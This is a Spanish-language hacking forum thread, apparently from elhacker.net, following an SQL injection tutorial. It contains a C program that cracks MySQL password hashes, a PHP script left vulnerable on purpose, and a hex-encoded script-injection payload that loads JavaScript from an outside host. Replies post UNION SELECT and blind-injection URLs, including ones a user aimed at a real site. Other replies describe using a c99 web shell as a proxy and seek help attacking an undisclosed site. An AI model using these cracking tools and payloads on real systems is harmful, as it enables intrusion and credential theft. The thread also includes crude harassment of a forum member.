#define MAX_CHAR 126

/* Maximum length of password */
#define MAX_LEN 12

#define MASK 0x7fffffffL

int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
  int i, c;
  u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
  u32 newstate1, newstate2, newstate3;
  u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
  u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
  i = -1;
  sum = 7;
  state1_ary[0] = 1345345333L;
  state2_ary[0] = 0x12345671L;

  while (1) {
    while (i < stop) {
      i++;
      pass_ary[i] = MIN_CHAR;
      step_ary[i] = (state1_ary[i] & 0x3f) + sum;
      xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
      sum += MIN_CHAR;
      state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
      state2_ary[i+1] = state2_ary[i]
        + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
    }

    state1 = state1_ary[i+1];
    state2 = state2_ary[i+1];
    step = (state1 & 0x3f) + sum;
    xor1 = step*MIN_CHAR + (state1 << 8);
    xor2 = (state2 << 8) ^ state1;

    for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
      newstate2 = state2 + (xor1 ^ xor2);
      newstate1 = state1 ^ xor1;

      newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
      div = (newstate1 & 0x3f) + sum + c;
      diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
      if (diff % div != 0) continue;
      d = diff / div;
      if (d < MIN_CHAR || d > MAX_CHAR) continue;

      div = (newstate3 & 0x3f) + sum + c + d;
      diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
      if (diff % div != 0) continue;
      e = diff / div;
      if (e < MIN_CHAR || e > MAX_CHAR) continue;

      pass_ary[i+1] = c;
      pass_ary[i+2] = d;
      pass_ary[i+3] = e;
      return 1;
    }

    while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
      sum -= MAX_CHAR;
      i--;
    }
    if (i < 0) break;
    pass_ary[i]++;
    xor_ary[i] += step_ary[i];
    sum++;
    state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
    state2_ary[i+1] = state2_ary[i]
      + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
  }

  return 0;
}

void crack(char *hash)
{
  int i, len;
  u32 targ1, targ2, targ3;
  int pass[MAX_LEN];

  if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
    printf("Invalid password hash: %s\n", hash);
    return;
  }
  printf("Hash: %08lx%08lx\n", targ1, targ2);
  targ3 = targ2 - targ1;
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
  targ3 = targ2 - ((targ3 << 8) ^ targ1);

  for (len = 3; len <= MAX_LEN; len++) {
    printf("Trying length %d\n", len);
    if ( crack0(len-4, targ1, targ3, pass) ) {
      printf("Found pass: ");
      for (i = 0; i < len; i++)
        putchar(pass[i]);
      putchar(`\n`);
      break;
    }
  }
  if (len > MAX_LEN)
    printf("Pass not found\n");
}

int main(int argc, char *argv[])
{
  int i;
  if (argc <= 1)
    printf("usage: %s hash\n", argv[0]);
  for (i = 1; i < argc; i++)
    crack(argv[i]);
  return 0;
}

----------------------------------------------------
script vulnerable

Code sql!:

Código:
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL auto_increment,
  `name` varchar(50) NOT NULL,
  `password` varchar(50) NOT NULL,
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
­­ users ­­
INSERT INTO `users` VALUES (1, `administrator`, `1234%&_`);
INSERT INTO `users` VALUES (2, `ka0x`, `t3st_bl1nd`);
INSERT INTO `users` VALUES (3, `bush`, `terrorist`);

script php:


Código:
<?php
# ­­­­ CONFIG ­­­­­
$host = `localhost`;
$dbuser = `root`;
$dbpass = `password`;
$dbname = `blind`;
# ­­­­­­­­­­­­­­­­­
echo "<title>Blind SQL Injection Test ­ D.O.M LABS 2008</title>";
$db = mysql_connect($host, $dbuser, $dbpass);
mysql_select_db($dbname,$db);
$sql = "SELECT * FROM users WHERE id=".$_GET[`id`];
            $query = mysql_query($sql);
            if(@mysql_num_rows($query)==0){
                    die(`No hay columnas`);
            }
            $result=@mysql_fetch_row($query);
            echo "<h2><center><u>Blind SQL Injection Test<br>D.O.M LABS</u><br><
br>";
            echo "<font color=`#FF0000`>user_id: </font>".$result[0]."<br>";
            echo "<font color=`#FF0000`>username: </font>".$result[1]."<br>";
            // echo "Password: ".$result[2]."<br>";
            echo "</h2></center>";
            die();
?>


Explorador de base de datos (General Injection Explorer 3.0) atravez de sqli by  PonyMagic (http://ponymagic.diosdelared.com/?coment=4533)

uso: PonyMagic (http://ponymagic.diosdelared.com/?coment=4533)

Código:

(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Uso:

(http://img692.imageshack.us/img692/9366/84930379.gif)


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: Axus en 5 Diciembre 2008, 03:17 am
Gran Tutorial :D

Bien explicado y detallado.

Algunos post similares para facilitar la búsqueda.

Tutorial de Inyección SQL. (SQL Injection)
http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_inyeccion_sql_sql_injection-t98448.0.html

SQL Injection para principiantes, ejemplos en aplicaciones reales
http://foro.elhacker.net/bugs_y_exploits/sql_injection_para_principiantes_ejemplos_en_aplicaciones_reales-t142203.0.html

Este tema debe agregarse a la recopilación de Post.


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: mmilenaa en 22 Diciembre 2008, 22:16 pm
Hola.

Les cuento que me he leído y lo he intentado todo y no se qué estoy haciendo mal. Se supone que debo poner el código en el campo de password del sitio en cuestión, pero no funciona.  Ni con "magic quotes" ni sin ellas. He probado en varios sitios donde se que hay php+sql y tampoco me funciona :( De estos últimos conozco usuarios y contraseñas, de manera que lo hago en estos para probar y tampoco :( El sitio que me interesa no se si tiene SQL ni nada :(

Por otro lado el sitio que me interesa, no usa conexión segura, tiene unos javascripts y no se si esto afecte en algo si se pasan esas variables por algunos de ellos. Mejor dicho necesito ayudita :D Soy relativamente nueva en esto y es la primera vez que hago algo de esto :(

¿Alguien podría ayudarme? (Tocaría por MP pues no puedo dar la dirección del sitio en público). Gracias :D


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: fulldebian en 5 Enero 2009, 01:29 am
hola amigos
lei el tuto, muy bueno, encontre por suerte una web vulnerable, que me costo un bocho pero le estoy sacando datoss:

.php?id=-1/**/union/**/all/**/select/**/1,unhex(hex(current_user()))/*
me tiro el usuario

.php?id=-1/**/union/**/all/**/select/**/1,unhex(hex(version()))/*
me da la version

al quere conocer el pass, por ejemplo con lo mencionado en el tuto:

http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,Select_priv,0x3a,Insert_priv,0x3a,Update_pri
v,0x3a,Delete_priv,0x3a,Create_priv,0x3a,Drop_priv,0x3a,Reload_priv,0x3a,Shutdown_priv,0x3a,P
rocess_priv,0x3a,File_priv,0x3a,Grant_priv,0x3a,References_priv,0x3a,Index_priv,0x3a,Alter_priv,
0x3a,Show_db_priv,0x3a,Super_priv,0x3a,Create_tmp_table_priv,0x3a,Lock_tables_priv,0x3a,Exe
cute_priv,0x3a,Repl_slave_priv,0x3a,Repl_client_priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+m
ysql.user--

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,table_schema,0x3a,privilege_type),3,4,5,6,7,8,9,10,
11,12,13,14,15,16+FROM+information_schema.schema_privileges--
http://localhost/print.php?
id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3a,privileg
e_type),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_schema.column_privileges--


o cuando quiero ver el archivo etc/password

http://localhost/print.php?id=-1+union+all+select+1,schema_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_s
chema.schem



me aparece que el usuario no puede acceder a la base de datos:

Access denied for user 'yyduhf' to database 'information_schema'

como puede seguir? estoy estancado......
gracias amigos


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: jozy en 24 Enero 2009, 00:11 am
vos sos l0ve ?, si no sos l0ve, sos un chorro, y si no sos chorro, l0ve es chorro  :laugh:


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: W2P en 24 Enero 2009, 22:22 pm
te pasastes man muy weno el tuto! ;D pero como instalo el scrip del tutorial en appserv? es que me salen errores por todos lados.

Salu2


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: :ohk<any> en 26 Enero 2009, 16:38 pm
 ::)

buen tutorial bien explicado desde la teoria.
la verdad creo que de aqui en 1 año mas, todos sabran vulnerar sitios por sql injection  :P


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: WHK en 27 Enero 2009, 07:21 am
Me gustó mucho mucho mucho  ;D


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: W2P en 27 Enero 2009, 22:42 pm
perdonenme si soy pesado pero, alguno de ustedes me puede decir como instalar el script en appserv para practicar lo relativo al tutorial? :huh: :rolleyes:

Salu2


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: berz3k en 28 Enero 2009, 19:01 pm
Apenas le preguntaba a sdc sobre algunos tutos para armar labs, este tutorial es bastante bueno, aunque no pierde el merito el de ka0x , tambien bastante bien explicado.

-berz3k.


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: netscape en 28 Enero 2009, 20:53 pm
Citar
Apenas le preguntaba a sdc sobre algunos tutos para armar labs, este tutorial es bastante bueno, aunque no pierde el merito el de ka0x , tambien bastante bien explicado.

Yo estoy de acuerdo contigo con la idea de montar labs de busqueda de vulnerabilidades a nivel web, creo que se aprendería bastante... ;D

Saludos!!


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: HardieVon en 28 Enero 2009, 23:42 pm
pero para las conexiones remotas de mysql que no nesitas agregar tu ip para poder validar la conexion remota?


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: berz3k en 29 Enero 2009, 01:24 am
@HansVon

De que conexiones IP hablas? la injeccion es remote, que IP tienes que validar? que este solo en inet? XD

-berz3k.


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: HardieVon en 29 Enero 2009, 03:03 am
Para explicar mejor.


checa eso que me muestra el Cpanel.

Citar
Host de Acceso Remoto a Base de Datos

Puede permitir servidores de web externos a conectarse a sus bases de datos de MySQL mediante añadiendo su nombre de dominio a la lista de hosts que tiene la habilidad de ingresar las bases de datos de tu sitio de web. localhost se refiere al sevidor donde tu sitio esta hospedado.

tal vez el autor no se dio cuenta por que estaba ingresando con la c99 desde el mismo host.


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: 6666 en 13 Febrero 2009, 19:14 pm
Bueno respondiendo algunos comentarios:


Citar
vos sos l0ve ?, si no sos l0ve, sos un chorro, y si no sos chorro, l0ve es chorro  :laugh:

el tuto lo escribi completamente recopilando informacion de todos lados .. esta mal? por eso no es ser chorro y tenes un pedazo de tuto. :)

Citar
me aparece que el usuario no puede acceder a la base de datos:

Access denied for user 'yyduhf' to database 'information_schema'

lo que pasa que algunas veces tenes permisos para hacer todo lo del tutorial .. la idea es ver las posibilidades a la hora de atacar el servidor.

y eso de acceso denegado es por que el usuario en ese momento no tiene permisos para ingresar a las base de datos mysql o information_schema.


despues hay algo que tengo que explicar y es la conexion remota desde un atacante a su victima .. como veran use el nmap  y vi que el puerto 3306 estaba abierto ..

y use una c99 para conectarme .. lo que pasa que use la c99 por que puedo manipular las tablas y etc .. y accedi a mi propio servidor mysql por que todo el tuto esta en local.

si se ponen a pensar se podria subir una shell c99 a cualquier otro host y atravez de esa c99 conectarse a la victima y tendria la funcion de proxy digamos :).

mientras el servidor tenga el puerto 3306 abierto ya se puede conectar remotamente.



Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: [u]nsigned en 28 Febrero 2009, 03:52 am
Te felicito sos un kapo!!!!

Esto me va a servir mucho.

En la documentacion oficial de php, en la sección PHP at the Core: A Hacker's Guide to the Zend Engine tmb ahi info muy util, mas que nada para prevenir estas cosas.

Cyaz!


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: cristian89 en 31 Marzo 2009, 20:57 pm
una duda comose q una web es sqlblind??????????????'''' espero respuesta!


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: 6666 en 21 Abril 2009, 01:10 am
una duda comose q una web es sqlblind??????????????'''' espero respuesta!




bueno busca una url y al final agrega 1 and 1= 1 y despues 1 and 1=2 .. y si al hacer lo segundo cambia el contenido de la web es por que es vulnerable ..

ejemplo:




www.site.com/index.php?id=1 and 1=1
www.site.com/index.php?id=1 and 1=2

te recomiendo una buena tools para los blind's que se llama 'sqlmap'

y si quieres aprender blind sql en milw0rm hay un buen tuto:

http://milw0rm.com/papers/197

saludos!


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: MagnoBalt en 2 Junio 2009, 05:04 am
Hola l0ve Podes poner el Source del script vulnerable.
Seria de utilidad..
Gracias..


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: 6666 en 2 Junio 2009, 05:22 am
agregado al final del tuto!


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: MagnoBalt en 9 Junio 2009, 18:10 pm
gracias l0ve, mas completo todavia..
Saludos Man..


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: 6666 en 13 Noviembre 2009, 05:22 am
zarpao tuto ha quedado :P


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: Arg_oS en 24 Enero 2010, 19:46 pm
Felicidades por el gran tutorial pero podes poner el script vulnerable y como instalarlo en localhost...

Salu2...


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: ^Tifa^ en 1 Febrero 2010, 05:12 am
Este tipo de vulnerabilidades existen por haber programadores despreocupados y DBA mediocres.

De saber implementar las cosas como se supone deberian, para vulnerar un motor deberian encontrar un Bug interno dentro de la funcionalidad del motor como tal... pero este tipo de vulnerabilidades, sinceramente no tiene perdon por parte del programador y por parte del DBA, deberian ambos ser despedidos.

Un saludo.


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: roy-juano en 25 Marzo 2010, 22:06 pm

Felicidades parce, es el tuto mas completo que he visto en toda la internet.
Muchas gracias  ;-)


Título: Re: Gran tutorial sobre inyecciones sql en MySQL
Publicado por: alexkof158 en 26 Marzo 2010, 09:24 am
Este tipo de vulnerabilidades existen por haber programadores despreocupados y DBA mediocres.

De saber implementar las cosas como se supone deberian, para vulnerar un motor deberian encontrar un Bug interno dentro de la funcionalidad del motor como tal... pero este tipo de vulnerabilidades, sinceramente no tiene perdon por parte del programador y por parte del DBA, deberian ambos ser despedidos.

Un saludo.
Perdon por salirme del tema pero tifa esta rikisimaaa Besotes mi amor